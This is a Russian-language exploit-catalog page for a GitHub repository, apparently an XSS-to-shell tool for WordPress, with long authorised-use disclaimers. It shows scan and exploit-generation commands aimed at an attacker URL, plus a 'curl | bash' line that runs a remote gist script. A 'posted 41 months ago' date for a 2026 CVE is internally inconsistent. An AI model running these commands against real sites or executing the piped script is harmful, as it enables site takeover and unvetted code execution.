Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/horkimhab/cve-2026-64638
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - Черновик или TODO

Репозиторий
41 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-64638

Пожертвования

Поддержите разработку этого проекта через PayPal или отсканировав QR-код ниже.

paypal

QR-код для пожертвования

⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  • Локальные виртуальные машины
  • Docker-контейнеры
  • Изолированные лабораторные среды
  • Авторизованные среды тестирования на проникновение

Пример настройки:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Пример использования:

root@kitploit:~
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

Примечание:

  • При клонировании из другого проекта необходимо выполнить curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y для очистки вложенного каталога .git
  • например: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Авторство и ссылки

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 Образовательный репозиторий по исследованию безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.


⚠️ Отказ от ответственности и правовые аспекты

Назначение

Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности.

Он создан, чтобы помочь пользователям узнать о:

  • Уязвимостях безопасности
  • Концепциях песочниц и изоляции
  • Безопасном программировании и защитных практиках

Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  • Личные лаборатории или виртуальные машины
  • Docker или изолированные среды
  • Авторизованное тестирование на проникновение
  • Обучение кибербезопасности или академические исследования

Несанкционированное или незаконное использование строго запрещено.


Отсутствие ответственности

Автор и соавторы не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  • Вы несёте ответственность за свои действия
  • Вы будете использовать его законно и этично
  • Проект предоставляется без гарантий

Этичное использование

Этот проект предназначен для:

  • Исследований в области защитной безопасности
  • Обучения кибербезопасности
  • Повышения осведомлённости об уязвимостях
  • Исследований безопасных систем и программного обеспечения

Пожалуйста, следуйте практике ответственного раскрытия информации и соблюдайте все применимые законы.


Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.

Скачать инструмент